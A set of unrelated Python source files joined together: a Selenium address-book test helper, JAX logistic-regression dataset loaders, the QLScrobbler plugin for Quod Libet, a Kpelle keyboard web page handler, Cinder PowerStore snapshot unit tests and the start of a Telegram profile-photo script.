name1 = strs[2].text
name2 = strs[1].text
id=element.find_element_by_name("selected[]").get_attribute("value")
all_phones=strs[5].text
all_emails=strs[4].text
self.contact_cache.append(Contact(firstname=name1, lastname=name2, id=id,
all_phones_from_home_page=all_phones, all_emails_from_home_page=all_emails))
return list(self.contact_cache)
def open_contact_to_edit_by_index(self,index):
wd = self.app.wd
self.open_contacts_page()
row=wd.find_elements_by_name("entry")[index]
cell=row.find_elements_by_tag_name("td")[7]
cell.find_element_by_tag_name("a").click()
def open_contact_view_by_index(self,index):
wd = self.app.wd
self.open_contacts_page()
row = wd.find_elements_by_name("entry")[index]
cell = row.find_elements_by_tag_name("td")[6]
cell.find_element_by_tag_name("a").click()
def get_contact_info_from_edit_page(self,index):
wd = self.app.wd
self.open_contact_to_edit_by_index(index)
firstname= wd.find_element_by_name("firstname").get_attribute("value")
lastname= wd.find_element_by_name("lastname").get_attribute("value")
#middlename = wd.find_element_by_name("middlename").get_attribute("value")
#title = wd.find_element_by_name("title").get_attribute("value")
#nickname = wd.find_element_by_name("nickname").get_attribute("value")
#company= wd.find_element_by_name("company").get_attribute("value")
#address = wd.find_element_by_name("address").get_attribute("value")
id= wd.find_element_by_name("id").get_attribute("value")
homephone= wd.find_element_by_name("home").get_attribute("value")
workphone= wd.find_element_by_name("work").get_attribute("value")
mobilephone= wd.find_element_by_name("mobile").get_attribute("value")
secondaryphone= wd.find_element_by_name("phone2").get_attribute("value")
email = wd.find_element_by_name("email").get_attribute("value")
email2 = wd.find_element_by_name("email2").get_attribute("value")
email3 = wd.find_element_by_name("email3").get_attribute("value")
#ayear= wd.find_element_by_name("ayear").get_attribute("value")
#byear= wd.find_element_by_name("byear").get_attribute("value")
#homepage= wd.find_element_by_name("homepage").get_attribute("value")
#address2= wd.find_element_by_name("address2").get_attribute("value")
#phone2= wd.find_element_by_name("phone2").get_attribute("value")
#notes= wd.find_element_by_name("notes").get_attribute("value")
return Contact(firstname=firstname,lastname=lastname,id=id,home=homephone,work=workphone,
mobile=mobilephone,phone2=secondaryphone, email=email,email2=email2, email3=email3)
def get_contact_from_view_page(self,index):
wd = self.app.wd
self.open_contact_view_by_index(index)
text=wd.find_element_by_id("content").text
homephone = re.search("H: (.*)", text).group(1)
workphone = re.search("W: (.*)", text).group(1)
mobilephone = re.search("M: (.*)", text).group(1)
secondaryphone = re.search("P: (.*)", text).group(1)
return Contact(home=homephone, work=workphone, mobile=mobilephone, phone2=secondaryphone)
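# Usage sketch (hypothetical fixture wiring; the application fixture itself is
# defined elsewhere in this project): with this helper exposed as app.contact,
#   app.contact.mod_contact_by_id("42", Contact(firstname="Ann", lastname="Lee"))
# opens the contacts page, edits the row whose checkbox carries value "42",
# refills every field and resets contact_cache so the next get_contact_list()
# re-reads the page instead of returning stale data.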
|
from multi_logreg import register_pytree_node_dataclass
import datasets
import numpy as np
import jax.numpy as jnp
import jax
from preprocess_logreg import PreProcessLogReg
from argparse import Namespace
from os import path
from typing import Dict, Any
from zipfile import ZipFile
from typing import Tuple
from dataclasses import dataclass
Dataset = Tuple[jnp.ndarray, jnp.ndarray]
@jax.jit
def normalize(inputs: jnp.ndarray) -> jnp.ndarray:
"""Normalizes feature vectors so that they have unit L2-norm"""
return inputs / jnp.linalg.norm(inputs, ord=2, axis=1, keepdims=True)
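# Minimal usage sketch with made-up values (not part of the original module):
# for x = jnp.array([[3.0, 4.0], [0.0, 2.0]]), normalize(x) scales each row to
# unit L2-norm, giving [[0.6, 0.8], [0.0, 1.0]], so
# jnp.linalg.norm(normalize(x), axis=1) is approximately [1.0, 1.0].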
@register_pytree_node_dataclass
@dataclass(eq=True, frozen=True)
class MyLogReg(PreProcessLogReg):
"""Multi-class logistic regression, with L2 normalization applied to each input"""
def preprocess(self, inputs: jnp.ndarray) -> jnp.ndarray:
return normalize(inputs)
def mnist_binary(args: Namespace) -> Tuple[Namespace, Dataset, Dataset, MyLogReg]:
"""Initialize an experiment using Binary-MNIST (8 vs 3)"""
X, y, X_test, y_test = datasets.mnist_binary(8, neg_class=3, dtype=np.float64)
train = X, y
test = X_test, y_test
model = MyLogReg(lamb=args.lamb, epsilon=args.epsilon, delta=args.delta, sigma=args.sigma,
classes=np.array([0.0, 1.0]))
args.feature_min = 0.0 if args.feature_min is None else args.feature_min
args.feature_max = 1.0 if args.feature_max is None else args.feature_max
return args, train, test, model
def mnist(args: Namespace) -> Tuple[Namespace, Dataset, Dataset, MyLogReg]:
"""Initialize an experiment using MNIST"""
X, y, X_test, y_test = datasets.mnist(dtype=np.float64)
train = X, y
test = X_test, y_test
model = MyLogReg(lamb=args.lamb, epsilon=args.epsilon, delta=args.delta, sigma=args.sigma,
classes=np.arange(10.0))
args.feature_min = 0.0 if args.feature_min is None else args.feature_min
args.feature_max = 1.0 if args.feature_max is None else args.feature_max
return args, train, test, model
def fashion_mnist(args: Namespace) -> Tuple[Namespace, Dataset, Dataset, MyLogReg]:
"""Initialize an experiment using Fashion-MNIST"""
X, y, X_test, y_test = datasets.fashion_mnist(dtype=np.float64)
train = X, y
test = X_test, y_test
model = MyLogReg(lamb=args.lamb, epsilon=args.epsilon, delta=args.delta, sigma=args.sigma,
classes=np.arange(10.0))
args.feature_min = 0.0 if args.feature_min is None else args.feature_min
args.feature_max = 1.0 if args.feature_max is None else args.feature_max
return args, train, test, model
def har(args: Namespace) -> Tuple[Namespace, Dataset, Dataset, MyLogReg]:
"""Initialize an experiment using HAR"""
url = "https://archive.ics.uci.edu/ml/machine-learning-databases/00240/UCI%20HAR%20Dataset.zip"
filename = "UCI_HAR_Dataset.zip"
datasets._download(url, filename)
arrays = {'X': 'UCI HAR Dataset/train/X_train.txt',
'y': 'UCI HAR Dataset/train/y_train.txt',
'X_test': 'UCI HAR Dataset/test/X_test.txt',
'y_test': 'UCI HAR Dataset/test/y_test.txt'}
with ZipFile(path.join(datasets._DATA, filename)) as z:
for a, p in arrays.items():
with z.open(p) as f:
arrays[a] = np.loadtxt(f)
train = arrays['X'], arrays['y']
test = arrays['X_test'], arrays['y_test']
model = MyLogReg(lamb=args.lamb, epsilon=args.epsilon, delta=args.delta, sigma=args.sigma,
classes=np.arange(1.0, 7.0))
args.feature_min = -1.0 if args.feature_min is None else args.feature_min
args.feature_max = 1.0 if args.feature_max is None else args.feature_max
return args, train, test, model
|
# QLScrobbler: an Audioscrobbler client plugin for Quod Libet.
# version 0.11
# (C) 2005-2012 by <NAME> <<EMAIL>>,
# <NAME> <<EMAIL>>,
# <NAME> <<EMAIL>>,
# <NAME> <<EMAIL>>,
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# Licensed under GPLv2. See Quod Libet's COPYING for more information.
from httplib import HTTPException
import cPickle as pickle
import os
import threading
import time
import urllib
import urllib2
from gi.repository import Gtk, GLib
try:
from hashlib import md5
except ImportError:
from md5 import md5
import quodlibet
from quodlibet import config, const, app, parse, util, qltk
from quodlibet.plugins.events import EventPlugin
from quodlibet.plugins import PluginConfigMixin
from quodlibet.qltk.entry import ValidatingEntry, UndoEntry
from quodlibet.qltk.msg import Message
from quodlibet.util.dprint import print_d
SERVICES = {
'Last.fm': 'http://post.audioscrobbler.com/',
'Libre.fm': 'http://turtle.libre.fm/'
}
DEFAULT_SERVICE = 'Last.fm'
DEFAULT_TITLEPAT = '<title><version| (<version>)>'
DEFAULT_ARTISTPAT = '<artist|<artist>|<composer|<composer>|<performer>>>'
def config_get(key, default=''):
"""Returns value for 'key' from config. If key is missing *or empty*,
return default."""
try:
return (config.get("plugins", "scrobbler_%s" % key) or default)
except config.Error:
return default
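# For example, config_get("service") falls back to '' when the option is unset
# or empty, while config_get("service", DEFAULT_SERVICE) falls back to
# "Last.fm" (an illustration of the fallback behaviour documented above).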
class QLSubmitQueue(PluginConfigMixin):
"""Manages the submit queue for scrobbles. Works independently of the
QLScrobbler plugin being enabled; other plugins may use submit() to queue
songs for scrobbling.
"""
CLIENT = "qlb"
PROTOCOL_VERSION = "1.2"
DUMP = os.path.join(const.USERDIR, "scrobbler_cache")
# This must be kept the same as `QLScrobbler`
CONFIG_SECTION = "scrobbler"
# These objects are shared across instances, to allow other plugins to
# queue scrobbles in future versions of QL
queue = []
changed_event = threading.Event()
def config_get_url(self):
"""Gets the URL for the currently configured service.
This logic was used often enough to be split out from generic config"""
# TODO: share this between the classes better
service = self.config_get('service', DEFAULT_SERVICE)
if service in SERVICES:
return SERVICES[service]
else:
return self.config_get('url')
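# Illustration of the lookup above: with the 'service' option set to
# "Libre.fm" this returns "http://turtle.libre.fm/", while any value outside
# SERVICES (e.g. "Other...") falls through to the user-supplied scrobbler_url.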
def set_nowplaying(self, song):
"""Send a Now Playing notification."""
formatted = self._format_song(song)
if not formatted or self.nowplaying_song == formatted:
return
self.nowplaying_song = formatted
self.nowplaying_sent = False
self.changed()
def submit(self, song, timestamp=0):
"""Submit a song. If 'timestamp' is 0, the current time will
be used."""
formatted = self._format_song(song)
if formatted is None:
return
if timestamp > 0:
formatted['i'] = str(timestamp)
elif timestamp == 0:
formatted['i'] = str(int(time.time()))
else:
# TODO: Forging timestamps for submission from PMPs
return
self.queue.append(formatted)
self.changed()
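# Usage sketch (the timestamp value is illustrative): queue.submit(song)
# stamps the scrobble with the current time, queue.submit(song, timestamp=1345678900)
# keeps an explicit play time, and negative timestamps are dropped above
# because forged submissions are not supported yet.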
def _format_song(self, song):
"""Returns a dict with the keys formatted as required by spec."""
store = {
"l": str(song.get("~#length", 0)),
"n": str(song("~#track")),
"b": song.comma("album"),
"m": song("musicbrainz_trackid"),
"t": self.titlepat.format(song),
"a": self.artpat.format(song),
}
# Spec requires title and artist at minimum
if not (store.get("a") and store.get("t")):
return None
return store
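# Key reference for the dict built above, following the Audioscrobbler 1.2
# submission spec: a=artist, t=title, b=album, l=length in seconds,
# n=track number, m=MusicBrainz track id, i=timestamp (added in submit()),
# o=source and r=rating (added per-entry in send_submission()).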
def __init__(self):
self.nowplaying_song = None
self.nowplaying_sent = False
self.session_id = None
self.broken = False
self.username, self.password, self.base_url = ('', '', '')
# These need to be set early for _format_song to work
self.titlepat = parse.Pattern(
self.config_get('titlepat', "") or DEFAULT_TITLEPAT)
self.artpat = parse.Pattern(
self.config_get('artistpat', "") or DEFAULT_ARTISTPAT)
try:
disk_queue_file = open(self.DUMP, 'r')
disk_queue = pickle.load(disk_queue_file)
disk_queue_file.close()
os.unlink(self.DUMP)
self.queue += disk_queue
except Exception:
pass
@classmethod
def dump_queue(klass):
if klass.queue:
try:
disk_queue_file = open(klass.DUMP, 'w')
pickle.dump(klass.queue, disk_queue_file)
disk_queue_file.close()
except IOError:
pass
return 0
def _check_config(self):
user = self.config_get('username')
passw = md5(self.config_get('password')).hexdigest()
url = self.config_get_url()
if not user or not passw or not url:
if self.queue and not self.broken:
self.quick_dialog("Please visit the Plugins window to set "
"QLScrobbler up. Until then, songs will not be "
"submitted.", Gtk.MessageType.INFO)
self.broken = True
elif (self.username, self.password,
self.base_url) != (user, passw, url):
self.username, self.password, self.base_url = (user, passw, url)
self.broken = False
self.handshake_sent = False
self.offline = self.config_get_bool('offline')
self.titlepat = parse.Pattern(
self.config_get('titlepat', "") or DEFAULT_TITLEPAT)
self.artpat = parse.Pattern(
self.config_get('artistpat', "") or DEFAULT_ARTISTPAT)
def changed(self):
"""Signal that settings or queue contents were changed."""
self._check_config()
if not self.broken and not self.offline and (self.queue or
(self.nowplaying_song and not self.nowplaying_sent)):
self.changed_event.set()
return
self.changed_event.clear()
def run(self):
"""Submit songs from the queue. Call from a daemon thread."""
# The spec calls for exponential backoff of failed handshakes, with a
# minimum of 1m and maximum of 120m delay between attempts.
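# With the doubling below, successive failed handshakes wait roughly
# 2, 4, 8, 16, 32, 64 and then a capped 120 minutes between attempts.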
self.handshake_sent = False
self.handshake_event = threading.Event()
self.handshake_event.set()
self.handshake_delay = 1
self.failures = 0
while True:
self.changed_event.wait()
if not self.handshake_sent:
self.handshake_event.wait()
if self.send_handshake():
self.failures = 0
self.handshake_delay = 1
self.handshake_sent = True
else:
self.handshake_event.clear()
self.handshake_delay = min(self.handshake_delay * 2, 120)
GLib.timeout_add(self.handshake_delay * 60 * 1000,
self.handshake_event.set)
continue
self.changed_event.wait()
if self.queue:
if self.send_submission():
self.failures = 0
else:
self.failures += 1
if self.failures >= 3:
self.handshake_sent = False
elif self.nowplaying_song and not self.nowplaying_sent:
self.send_nowplaying()
self.nowplaying_sent = True
else:
# Nothing left to do; wait until something changes
self.changed_event.clear()
def send_handshake(self, show_dialog=False):
# construct url
stamp = int(time.time())
auth = md5(self.password + str(stamp)).hexdigest()
url = "%s/?hs=true&p=%s&c=%s&v=%s&u=%s&a=%s&t=%d" % (
self.base_url, self.PROTOCOL_VERSION, self.CLIENT,
QLScrobbler.PLUGIN_VERSION, self.username, auth, stamp)
print_d("Sending handshake to service.")
try:
resp = urllib2.urlopen(url)
except (IOError, HTTPException):
if show_dialog:
self.quick_dialog(
"Could not contact service '%s'." %
util.escape(self.base_url), Gtk.MessageType.ERROR)
else:
print_d("Could not contact service. Queueing submissions.")
return False
except ValueError:
self.quick_dialog("Authentication failed: invalid URL.",
Gtk.MessageType.ERROR)
self.broken = True
return False
# check response
lines = resp.read().rstrip().split("\n")
status = lines.pop(0)
print_d("Handshake status: %s" % status)
if status == "OK":
self.session_id, self.nowplaying_url, self.submit_url = lines
self.handshake_sent = True
print_d("Session ID: %s, NP URL: %s, Submit URL: %s" % (
self.session_id, self.nowplaying_url, self.submit_url))
return True
elif status == "BADAUTH":
self.quick_dialog("Authentication failed: Invalid username '%s' "
"or bad password." % util.escape(self.username),
Gtk.MessageType.ERROR)
self.broken = True
elif status == "BANNED":
self.quick_dialog("Client is banned. Contact the author.",
Gtk.MessageType.ERROR)
self.broken = True
elif status == "BADTIME":
self.quick_dialog("Wrong system time. Submissions may fail until "
"it is corrected.", Gtk.MessageType.ERROR)
else: # "FAILED"
self.quick_dialog(status, Gtk.MessageType.ERROR)
self.changed()
return False
def _check_submit(self, url, data):
data_str = urllib.urlencode(data)
try:
resp = urllib2.urlopen(url, data_str)
except (IOError, HTTPException):
print_d("Audioscrobbler server not responding, will try later.")
return False
resp_save = resp.read()
status = resp_save.rstrip().split("\n")[0]
print_d("Submission status: %s" % status)
if status == "OK":
return True
elif status == "BADSESSION":
self.handshake_sent = False
return False
else:
return False
def send_submission(self):
data = {'s': self.session_id}
to_submit = self.queue[:min(len(self.queue), 50)]
for idx, song in enumerate(to_submit):
for key, val in song.items():
data['%s[%d]' % (key, idx)] = val.encode('utf-8')
data['o[%d]' % idx] = 'P'
data['r[%d]' % idx] = ''
print_d('Submitting song(s): %s' %
('\n\t'.join(['%s - %s' % (s['a'], s['t']) for s in to_submit])))
if self._check_submit(self.submit_url, data):
del self.queue[:len(to_submit)]
return True
else:
return False
def send_nowplaying(self):
data = {'s': self.session_id}
for key, val in self.nowplaying_song.items():
data[key] = val.encode('utf-8')
print_d('Now playing song: %s - %s' %
(self.nowplaying_song['a'], self.nowplaying_song['t']))
return self._check_submit(self.nowplaying_url, data)
def quick_dialog_helper(self, dialog_type, msg):
dialog = Message(dialog_type, app.window, "QLScrobbler", msg)
dialog.connect('response', lambda dia, resp: dia.destroy())
dialog.show()
def quick_dialog(self, msg, dialog_type):
GLib.idle_add(self.quick_dialog_helper, dialog_type, msg)
class QLScrobbler(EventPlugin, PluginConfigMixin):
PLUGIN_ID = "QLScrobbler"
PLUGIN_NAME = _("AudioScrobbler Submission")
PLUGIN_DESC = _("Audioscrobbler client for Last.fm, Libre.fm and other "
"Audioscrobbler services.")
PLUGIN_ICON = Gtk.STOCK_CONNECT
PLUGIN_VERSION = "0.12"
# Retain original config section
CONFIG_SECTION = "scrobbler"
def __init__(self):
self.__enabled = False
self.queue = QLSubmitQueue()
queue_thread = threading.Thread(None, self.queue.run)
queue_thread.setDaemon(True)
queue_thread.start()
self.start_time = 0
self.unpaused_time = 0
self.elapsed = 0
self.nowplaying = None
self.exclude = self.config_get('exclude')
# Set up exit hook to dump queue
quodlibet.quit_add(0, self.queue.dump_queue)
def config_get_url(self):
"""Gets the URL for the currently configured service.
This logic was used often enough to be split out from generic config"""
service = self.config_get('service', DEFAULT_SERVICE)
if service in SERVICES:
return SERVICES[service]
else:
return self.config_get('url')
def plugin_on_song_ended(self, song, stopped):
if song is None or not self.__enabled:
return
if self.unpaused_time > 0:
self.elapsed += time.time() - self.unpaused_time
# Spec: * don't submit when song length < 00:30
# * submit at end of playback (not in the middle, as with v1.1)
# * submit if played for >= .5*length or >= 240s
# we check 'elapsed' rather than 'length' to work around wrong ~#length
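# Worked example of the rule above: a 200-second track submits once roughly
# 100 seconds have played, while a 10-minute track submits after 240 seconds.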
if self.elapsed < 30:
return
if self.elapsed < 240 and self.elapsed <= .5 * song.get("~#length", 0):
return
print_d("Checking against filter %s" % self.exclude)
if self.exclude and parse.Query(self.exclude).search(song):
print_d("Not submitting: %s" % song("~artist~title"))
return
self.queue.submit(song, self.start_time)
def song_excluded(self, song):
if self.exclude and parse.Query(self.exclude).search(song):
print_d("%s is excluded by %s" %
(song("~artist~title"), self.exclude))
return True
return False
def send_nowplaying(self, song):
if not self.song_excluded(song):
self.queue.set_nowplaying(song)
def plugin_on_song_started(self, song):
if song is None:
return
self.start_time = int(time.time())
if app.player.paused:
self.unpaused_time = 0
else:
self.unpaused_time = time.time()
self.elapsed = 0
if self.__enabled and not app.player.paused:
self.send_nowplaying(song)
else:
self.nowplaying = song
def plugin_on_paused(self):
if self.unpaused_time > 0:
self.elapsed += time.time() - self.unpaused_time
self.unpaused_time = 0
def plugin_on_unpaused(self):
self.unpaused_time = time.time()
if self.__enabled and self.nowplaying:
self.send_nowplaying(self.nowplaying)
self.nowplaying = None
def enabled(self):
self.__enabled = True
print_d("Plugin enabled - accepting new songs.")
def disabled(self):
self.__enabled = False
print_d("Plugin disabled - not accepting any new songs.")
def PluginPreferences(self, parent):
def changed(entry, key):
if entry.get_property('sensitive'):
config.set("plugins", "scrobbler_" + key, entry.get_text())
def combo_changed(widget, urlent):
service = widget.get_active_text()
config.set("plugins", "scrobbler_service", service)
urlent.set_sensitive((service not in SERVICES))
urlent.set_text(self.config_get_url())
def check_login(*args):
queue = QLSubmitQueue()
queue.changed()
status = queue.send_handshake(show_dialog=True)
if status:
queue.quick_dialog("Authentication successful.",
Gtk.MessageType.INFO)
box = Gtk.VBox(spacing=12)
# first frame
table = Gtk.Table(5, 2)
table.set_col_spacings(6)
table.set_row_spacings(6)
labels = []
label_names = [_("_Service:"), _("_URL:"), _("User_name:"),
_("_Password:")]
for idx, label in enumerate(map(Gtk.Label, label_names)):
label.set_alignment(0.0, 0.5)
label.set_use_underline(True)
table.attach(label, 0, 1, idx, idx + 1,
xoptions=Gtk.AttachOptions.FILL |
Gtk.AttachOptions.SHRINK)
labels.append(label)
row = 0
service_combo = Gtk.ComboBoxText()
table.attach(service_combo, 1, 2, row, row + 1)
cur_service = self.config_get('service')
for idx, serv in enumerate(sorted(SERVICES.keys()) + ["Other..."]):
service_combo.append_text(serv)
if cur_service == serv:
service_combo.set_active(idx)
if service_combo.get_active() == -1:
service_combo.set_active(0)
labels[row].set_mnemonic_widget(service_combo)
row += 1
# url
entry = UndoEntry()
entry.set_text(self.config_get('url'))
entry.connect('changed', changed, 'url')
service_combo.connect('changed', combo_changed, entry)
service_combo.emit('changed')
table.attach(entry, 1, 2, row, row + 1)
labels[row].set_mnemonic_widget(entry)
row += 1
# username
entry = UndoEntry()
entry.set_text(self.config_get('username'))
entry.connect('changed', changed, 'username')
table.attach(entry, 1, 2, row, row + 1)
labels[row].set_mnemonic_widget(entry)
row += 1
# password
entry = UndoEntry()
entry.set_text(self.config_get('password'))
entry.set_visibility(False)
entry.connect('changed', changed, 'password')
table.attach(entry, 1, 2, row, row + 1)
labels[row].set_mnemonic_widget(entry)
row += 1
# verify data
button = qltk.Button(_("_Verify account data"), Gtk.STOCK_INFO)
button.connect('clicked', check_login)
table.attach(button, 0, 2, 4, 5)
box.pack_start(qltk.Frame(_("Account"), child=table), True, True, 0)
# second frame
table = Gtk.Table(4, 2)
table.set_col_spacings(6)
table.set_row_spacings(6)
label_names = [_("_Artist pattern:"), _("_Title pattern:"),
_("Exclude _filter:")]
labels = []
for idx, label in enumerate(map(Gtk.Label, label_names)):
label.set_alignment(0.0, 0.5)
label.set_use_underline(True)
table.attach(label, 0, 1, idx, idx + 1,
xoptions=Gtk.AttachOptions.FILL |
Gtk.AttachOptions.SHRINK)
labels.append(label)
row = 0
# artist pattern
entry = UndoEntry()
entry.set_text(self.config_get('artistpat'))
entry.connect('changed', changed, 'artistpat')
table.attach(entry, 1, 2, row, row + 1)
entry.set_tooltip_text(_("The pattern used to format "
"the artist name for submission. Leave blank for default."))
labels[row].set_mnemonic_widget(entry)
row += 1
# title pattern
entry = UndoEntry()
entry.set_text(self.config_get('titlepat'))
entry.connect('changed', changed, 'titlepat')
table.attach(entry, 1, 2, row, row + 1)
entry.set_tooltip_text(_("The pattern used to format "
"the title for submission. Leave blank for default."))
labels[row].set_mnemonic_widget(entry)
row += 1
# exclude filter
entry = ValidatingEntry(parse.Query.is_valid_color)
entry.set_text(self.config_get('exclude'))
entry.set_tooltip_text(
_("Songs matching this filter will not be submitted."))
entry.connect('changed', changed, 'exclude')
table.attach(entry, 1, 2, row, row + 1)
labels[row].set_mnemonic_widget(entry)
row += 1
# offline mode
offline = self.ConfigCheckButton(
_("_Offline mode (don't submit anything)"),
'scrobbler_offline')
offline.set_active(self.config_get('offline') == "true")
table.attach(offline, 0, 2, row, row + 1)
box.pack_start(qltk.Frame(_("Submission"), child=table), True, True, 0)
return box
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import webapp2
import base
from google.appengine.ext.webapp import template
Language = 'Kpelle'
Language_native = 'Kpelle'
LanguageCode = 'kpe'
ScriptCode = 'Kpel'
encoding_font_list = [
{
'font_path': '/fonts/African_font_encodings/JGKpelleCombined.ttf',
'font_name': 'JG Kpelle combined',
'display_name': 'JG Kpelle combined',
},
]
unicode_font_list = [
{
'family': 'JG Kpelle Combined',
'longName': 'JG Kpelle combined',
'source': '/fonts/African_font_encodings/JGKpelleCombined.ttf',
'note': 'not Unicode',
},
]
kb_list = [
{'shortName': LanguageCode + '_' + ScriptCode,
'longName': Language + ' ' + ScriptCode,
'fontFamily': 'JG Kpelle Combined',
}
]
links = [
{'linkText': 'Keyboard',
'ref': '/' + LanguageCode + '/'
},
{'linkText': 'Keyboard conversions',
'ref': '/' + LanguageCode + '/kbtransforms/'
},
{'linkText': 'Wikipedia Kpelle syllabary',
'ref': 'https://en.wikipedia.org/wiki/Kpelle_syllabary'
},
{'linkText': 'Wikipedia Kpelle language',
'ref': 'https://en.wikipedia.org/wiki/Kpelle_language'},
{'linkText': 'ScriptSource',
'ref': 'https://scriptsource.org/cms/scripts/page.php?item_id=script_detail&key=Kpel'
},
{'linkText': 'Digital Orientalist',
'ref': 'https://digitalorientalist.com/2021/01/22/building-tools-with-bete-mende-and-kpelle-users/'
}
# {'linkText': 'Combiners',
# 'ref': '/kpe/diacritic/'
# },
]
encodedRanges = [
[0xc0, 0x179],
]
class langInfo():
def __init__(self):
self.LanguageCode = LanguageCode
self.Language = Language
self.Language_native = Language_native
self.test_data = u'FILL IN'
# !!!! NOTE that this is not yet Unicode
self.unicode_font_list = unicode_font_list
self.encoding_font_list = encoding_font_list
self.lang_list = [LanguageCode] # This may be extended
self.kb_list = kb_list
self.links = links
self.encoded_ranges = encodedRanges
# For additional resources for download
self.text_file_list = []
# TODO: Fill in the rest of the common data.
# TODO: Fill in with diacritics
diacritic_list = [unichr(x) for x in range(0x1c24, 0x1c37)]
#TODO: Fill in base consonant
default_base_consonant = u'\u1c00'
diacritic_list = [unichr(x) for x in range(0xa926, 0xa92d)]
default_base_consonant = u'\u1c00'
# Presents UI for conversions from font encoding to Unicode.
class ConvertUIHandler(webapp2.RequestHandler):
def get(self):
# All old characters
oldCharList = []
for run in encodedRanges:
oldCharList.extend([unichr(x) + ' ' for x in xrange(run[0], run[1])])
oldChars = ''.join(oldCharList)
text = self.request.get('text', oldChars)
font = self.request.get('font')
testStringList = [
{'name': 'Test 1', # Note: must escape the single quote.
'string': u'\u0004\u0005\u0006\u0007\u0008\u0009' +
u'\u000a\u000b'},
]
oldInput = text
unicodeChars = ''
unicodeCombiningChars = ''
template_values = {
'font': font,
'language': Language,
'langTag': LanguageCode,
'encodingList': encoding_font_list,
'encoding': encoding_font_list[0],
'kb_list': kb_list,
'unicodeFonts': unicode_font_list,
'links': links,
'oldChars': oldChars,
'oldInput': oldInput,
'text': text,
'textStrings': testStringList,
'showTools': self.request.get('tools', None),
'unicodeChars': unicodeChars,
'combiningChars': unicodeCombiningChars,
}
path = os.path.join(os.path.dirname(__file__), 'HTML/translit_general.html')
self.response.out.write(template.render(path, template_values))
langInstance = langInfo()
app = webapp2.WSGIApplication([
('/' + LanguageCode + '/', base.LanguagesHomeHandler),
('/' + LanguageCode + '/convertUI/', ConvertUIHandler),
('/' + LanguageCode + '/downloads/', base.Downloads),
('/' + LanguageCode + '/encodingRules/', base.EncodingRules),
('/' + LanguageCode + '/diacritic/', base.DiacriticHandler),
('/' + langInstance.LanguageCode + '/kbtransforms/', base.KeyboardTransforms),
], debug=True,
config={'langInfo': langInstance}
)
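# Route sketch: with LanguageCode set to 'kpe', '/kpe/convertUI/' is served by
# ConvertUIHandler above and '/kpe/kbtransforms/' by base.KeyboardTransforms;
# the shared langInstance is handed to every handler through the app config.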
|
# Copyright (c) 2021 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from cinder import exception
from cinder.tests.unit import fake_group
from cinder.tests.unit import fake_group_snapshot
from cinder.tests.unit.volume.drivers.dell_emc import powerstore
class TestVolumeGroupSnapshotCreateDelete(powerstore.TestPowerStoreDriver):
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_chap_config")
def setUp(self, mock_chap):
super(TestVolumeGroupSnapshotCreateDelete, self).setUp()
self.driver.check_for_setup_error()
self.group = fake_group.fake_group_obj(
self.context,
)
self.group_snapshot = fake_group_snapshot.fake_group_snapshot_obj(
self.context
)
self.group_snapshot.group = self.group
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.create_vg_snapshot")
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_vg_id_by_name")
@mock.patch("cinder.volume.volume_utils.is_group_a_cg_snapshot_type")
def test_create_volume_group_snapshot(self,
mock_is_cg,
mock_get_id,
mock_create):
self.driver.create_group_snapshot(self.context,
self.group_snapshot,
[])
@mock.patch("requests.request")
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_vg_id_by_name")
@mock.patch("cinder.volume.volume_utils.is_group_a_cg_snapshot_type")
def test_create_volume_group_snapshot_bad_status(self,
mock_is_cg,
mock_get_id,
mock_create):
mock_create.return_value = powerstore.MockResponse(rc=400)
error = self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_group_snapshot,
self.context,
self.group_snapshot,
[])
self.assertIn("Failed to create snapshot", error.msg)
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.delete_volume_or_snapshot")
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_vg_snapshot_id_by_name")
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_vg_id_by_name")
@mock.patch("cinder.volume.volume_utils.is_group_a_cg_snapshot_type")
def test_delete_volume_group_snapshot(self,
mock_is_cg,
mock_get_group_id,
mock_get_snapshot_id,
mock_delete):
self.driver.delete_group_snapshot(self.context,
self.group_snapshot,
[])
@mock.patch("requests.request")
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_vg_snapshot_id_by_name")
@mock.patch("cinder.volume.drivers.dell_emc.powerstore.client."
"PowerStoreClient.get_vg_id_by_name")
@mock.patch("cinder.volume.volume_utils.is_group_a_cg_snapshot_type")
def test_delete_volume_group_snapshot_bad_status(self,
mock_is_cg,
mock_get_group_id,
mock_get_snapshot_id,
mock_delete):
mock_delete.return_value = powerstore.MockResponse(rc=400)
error = self.assertRaises(exception.VolumeBackendAPIException,
self.driver.delete_group_snapshot,
self.context,
self.group_snapshot,
[])
self.assertIn("Failed to delete PowerStore volume group snapshot",
error.msg)
|
<filename>run.py
import asyncio
import base64
import json
import logging
import sys
from enum import Enum, auto
from typing import Dict, Optional, List
import prometheus_client
import requests
from prometheus_client import Gauge, Counter, start_http_server
from telethon.sync import TelegramClient
from telethon.tl.functions.photos import UploadProfilePhotoRequest, UpdateProfilePhotoRequest, \
GetUserPhotosRequest
from telethon.tl.types import InputPhoto, Photo, photos, UserProfilePhoto
logger = logging.getLogger(__name__)
class PFPState(Enum):
AWAKE = auto()
ASLEEP = auto()
